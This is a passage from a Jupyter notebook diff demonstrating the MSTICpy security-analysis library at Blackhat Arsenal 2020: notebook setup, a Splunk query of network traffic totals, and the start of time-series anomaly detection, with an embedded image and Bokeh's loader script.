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"
+    }
+   },
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "![border.png](attachment:070aeced-e5f5-4534-85e5-688b0031c657.png)"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "# MSTICpy at Blackhat Arsenal 2020"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "## Setup\n",
+    "\n",
+    "MSTICpy includes a feature called [nbinit](https://msticpy.readthedocs.io/en/latest/msticpy.nbtools.html?highlight=nbinit#module-msticpy.nbtools.nbinit) that handles the process of installing and importing modules into a notebook environment. This was developed to allow for a clearer starting cell in notebooks and to avoid users being presented with a very large cell block at the top of a notebook.<br>\n",
+    "By passing the notebook namespace to init_notebook() this function handles the job of installing and importing core MSTICpy packages along with any others that might be needed by a notebook.\n",
+    "\n",
+    "You must have msticpy installed to run this notebook:\n",
+    "```\n",
+    "%pip install --upgrade msticpy[timeseries, splunk, azsentinel]\n",
+    "```\n",
+    "MSTICpy versions > 0.8.5\n",
+    "\n",
+    "The notebook also uses MSTIC Notebooklets:\n",
+    "```\n",
+    "%pip install --upgrade msticnb\n",
+    "```"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 1,
+   "metadata": {},
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "Processing imports....\n",
+      "All packages are already installed\n",
+      "Checking configuration....\n",
+      "No errors found.\n",
+      "No warnings found.\n",
+      "Setting options....\n"
+     ]
+    },
+    {
+     "data": {
+      "text/html": [
+       "<h3>Notebook setup complete</h3>"
+      ],
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "Using Open PageRank. See https://www.domcop.com/openpagerank/what-is-openpagerank\n"
+     ]
+    }
+   ],
+   "source": [
+    "from msticpy.nbtools import nbinit\n",
+    "extra_imports = [\n",
+    "    \"msticpy.nbtools.timeseries, display_timeseries_anomolies\",\n",
+    "    \"msticpy.analysis.timeseries, timeseries_anomalies_stl\",\n",
+    "    \"datetime, datetime\",\n",
+    "    \"msticpy.nbtools.nbdisplay, draw_alert_entity_graph\",\n",
+    "    \"msticpy.sectools.ip_utils, convert_to_ip_entities\",\n",
+    "    \"msticpy.nbtools.ti_browser, browse_results\",\n",
+    "    \"IPython.display, Image\",\n",
+    "    \"msticpy.sectools.ip_utils, get_whois_info\",\n",
+    "    \"msticpy.sectools.ip_utils, get_ip_type\"\n",
+    "    \n",
+    "]\n",
+    "\n",
+    "nbinit.init_notebook(\n",
+    "    namespace=globals(),\n",
+    "    additional_packages=[\"pyvis\"],\n",
+    "    extra_imports=extra_imports,\n",
+    ");\n",
+    "\n",
+    "ti = TILookup()"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "## Data Acquisition - Splunk\n",
+    "The starting point for many notebooks is ingesting data to conduct analysis or investigation of. MSTICpy has a number of [query providers](https://msticpy.readthedocs.io/en/latest/data_acquisition/DataProviders.html) to allow users to query and return data from a number of sources. Below we are using the Splunk query provider to return data from our Splunk instance.<br> \n",
+    "> Note: Using *Splunk* API via *splunk-sdk* Python package - the MSTICpy Splunk provider is in beta.\n",
+    "\n",
+    "Data is returned in a Pandas [DataFrame](https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.html) for easy manipulation and to provide a common interface for other features in MSTICpy.<br><br>\n",
+    "Here we are getting a summary of our network traffic  in the time period we are interested in.\n"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": null,
+   "metadata": {},
+   "outputs": [],
+   "source": [
+    "splunk_host = widgets.Text(description='Splunk Host:')\n",
+    "splunk_user = widgets.Text(description='Splunk User:')\n",
+    "splunk_pwd = widgets.Password(description='Splunk Pwd:')\n",
+    "display(splunk_host)\n",
+    "display(splunk_user)\n",
+    "display(splunk_pwd)"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 7,
+   "metadata": {},
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "connected\n"
+     ]
+    }
+   ],
+   "source": [
+    "# Initialize a Splunk provider and connect to our Splunk instance.\n",
+    "splunk_prov = QueryProvider(\"Splunk\")\n",
+    "splunk_prov.connect(host=splunk_host.value, username=splunk_user.value, password=splunk_pwd.value)"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 8,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>TotalBytesSent</th>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>TimeGenerated</th>\n",
+       "      <th></th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>2020-07-06 00:00:00+00:00</th>\n",
+       "      <td>10823</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>2020-07-06 01:00:00+00:00</th>\n",
+       "      <td>14821</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>2020-07-06 02:00:00+00:00</th>\n",
+       "      <td>13532</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>2020-07-06 03:00:00+00:00</th>\n",
+       "      <td>11947</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>2020-07-06 04:00:00+00:00</th>\n",
+       "      <td>11193</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "                          TotalBytesSent\n",
+       "TimeGenerated                           \n",
+       "2020-07-06 00:00:00+00:00          10823\n",
+       "2020-07-06 01:00:00+00:00          14821\n",
+       "2020-07-06 02:00:00+00:00          13532\n",
+       "2020-07-06 03:00:00+00:00          11947\n",
+       "2020-07-06 04:00:00+00:00          11193"
+      ]
+     },
+     "execution_count": 8,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "# Define a Splunk Query and run it.\n",
+    "splunk_query = \"search host=network_sum index=blackhat earliest=0 | table TimeGenerated, TotalBytesSent\"\n",
+    "\n",
+    "stldemo = splunk_prov.exec_query(splunk_query)\n",
+    "stldemo['TimeGenerated'] = pd.to_datetime(stldemo['TimeGenerated'])\n",
+    "stldemo.set_index('TimeGenerated', inplace=True)\n",
+    "stldemo.sort_index(inplace=True)\n",
+    "stldemo.head()"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "## Timeseries Analysis of detected Anomalies\n",
+    "Once we have queried the data, there are a number of analysis features within MSTICpy to help understand the data and identify potential security incidents. \n",
+    "\n",
+    "In order to effectively hunt in a dataset analysts need to focus on specific events of interest. Below we use MSTICpy's [time series analysis](https://msticpy.readthedocs.io/en/latest/msticpy.analysis.html?highlight=timeseries#module-msticpy.analysis.timeseries) machine learning capabilities to identify anomalies in our network traffic for further investigation.<br>\n",
+    "As well as computing anomalies we visualize the data so that we can more easily see where these anomalies present themselves.\n",
+    "\n",
+    "> Note: Visualization powered by *Bokeh*\n"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 9,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "\n",
+       "    <div class=\"bk-root\">\n",
+       "        <a href=\"https://bokeh.org\" target=\"_blank\" class=\"bk-logo bk-logo-small bk-logo-notebook\"></a>\n",
+       "        <span id=\"1001\">Loading BokehJS ...</span>\n",
+       "    </div>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/javascript": [
+       "\n",
+       "(function(root) {\n",
+       "  function now() {\n",
+       "    return new Date();\n",
+       "  }\n",
+       "\n",
+       "  var force = true;\n",
+       "\n",
+       "  if (typeof root._bokeh_onload_callbacks === \"undefined\" || force === true) {\n",
+       "    root._bokeh_onload_callbacks = [];\n",
+       "    root._bokeh_is_loading = undefined;\n",
+       "  }\n",
+       "\n",
+       "  var JS_MIME_TYPE = 'application/javascript';\n",
+       "  var HTML_MIME_TYPE = 'text/html';\n",
+       "  var EXEC_MIME_TYPE = 'application/vnd.bokehjs_exec.v0+json';\n",
+       "  var CLASS_NAME = 'output_bokeh rendered_html';\n",
+       "\n",
+       "  /**\n",
+       "   * Render data to the DOM node\n",
+       "   */\n",
+       "  function render(props, node) {\n",
+       "    var script = document.createElement(\"script\");\n",
+       "    node.appendChild(script);\n",
+       "  }\n",
+       "\n",
+       "  /**\n",
+       "   * Handle when an output is cleared or removed\n",
+       "   */\n",
+       "  function handleClearOutput(event, handle) {\n",
+       "    var cell = handle.cell;\n",
+       "\n",
+       "    var id = cell.output_area._bokeh_element_id;\n",
+       "    var server_id = cell.output_area._bokeh_server_id;\n",
+       "    // Clean up Bokeh references\n",
+       "    if (id != null && id in Bokeh.index) {\n",
+       "      Bokeh.index[id].model.document.clear();\n",
+       "      delete Bokeh.index[id];\n",
+       "    }\n",
+       "\n",
+       "    if (server_id !== undefined) {\n",
+       "      // Clean up Bokeh references\n",
+       "      var cmd = \"from bokeh.io.state import curstate; print(curstate().uuid_to_server['\" + server_id + \"'].get_sessions()[0].document.roots[0]._id)\";\n",
+       "      cell.notebook.kernel.execute(cmd, {\n",
+       "        iopub: {\n",
+       "          output: function(msg) {\n",
+       "            var id = msg.content.text.trim();\n",
+       "            if (id in Bokeh.index) {\n",
+       "              Bokeh.index[id].model.document.clear();\n",
+       "              delete Bokeh.index[id];\n",
+       "            }\n",
+       "          }\n",
+       "        }\n",
+       "      });\n",
+       "      // Destroy server and session\n",
+       "      var cmd = \"import bokeh.io.notebook as ion; ion.destroy_server('\" + server_id + \"')\";\n",
+       "      cell.notebook.kernel.execute(cmd);\n",
+       "    }\n",
+       "  }\n",
+       "\n",
+       "  /**\n",
+       "   * Handle when a new output is added\n",
+       "   */\n",
+       "  function handleAddOutput(event, handle) {\n",
+       "    var output_area = handle.output_area;\n",
+       "    var output = handle.output;\n",
+       "\n",
+       "    // limit handleAddOutput to display_data with EXEC_MIME_TYPE content only\n",
+       "    if ((output.output_type != \"display_data\") || (!output.data.hasOwnProperty(EXEC_MIME_TYPE))) {\n",
+       "      return\n",
+       "    }\n",
+       "\n",
+       "    var toinsert = output_area.element.find(\".\" + CLASS_NAME.split(' ')[0]);\n",
+       "\n",
+       "    if (output.metadata[EXEC_MIME_TYPE][\"id\"] !== undefined) {\n",
+       "      toinsert[toinsert.length - 1].firstChild.textContent = output.data[JS_MIME_TYPE];\n",
+       "      // store reference to embed id on output_area\n",
+       "      output_area._bokeh_element_id = output.metadata[EXEC_MIME_TYPE][\"id\"];\n",
+       "    }\n",
+       "    if (output.metadata[EXEC_MIME_TYPE][\"server_id\"] !== undefined) {\n",
+       "      var bk_div = document.createElement(\"div\");\n",
+       "      bk_div.innerHTML = output.data[HTML_MIME_TYPE];\n",
+       "      var script_attrs = bk_div.children[0].attributes;\n",
+       "      for (var i = 0; i < script_attrs.length; i++) {\n",
+       "        toinsert[toinsert.length - 1].firstChild.setAttribute(script_attrs[i].name, script_attrs[i].value);\n",
+       "        toinsert[toinsert.length - 1].firstChild.textContent = bk_div.children[0].textContent\n",
+       "      }\n",
+       "      // store reference to server id on output_area\n",
+       "      output_area._bokeh_server_id = output.metadata[EXEC_MIME_TYPE][\"server_id\"];\n",
+       "    }\n",
+       "  }\n",
+       "\n",
+       "  function register_renderer(events, OutputArea) {\n",
+       "\n",
+       "    function append_mime(data, metadata, element) {\n",
+       "      // create a DOM node to render to\n",
+       "      var toinsert = this.create_output_subarea(\n",
+       "        metadata,\n",
+       "        CLASS_NAME,\n",
+       "        EXEC_MIME_TYPE\n",
+       "      );\n",
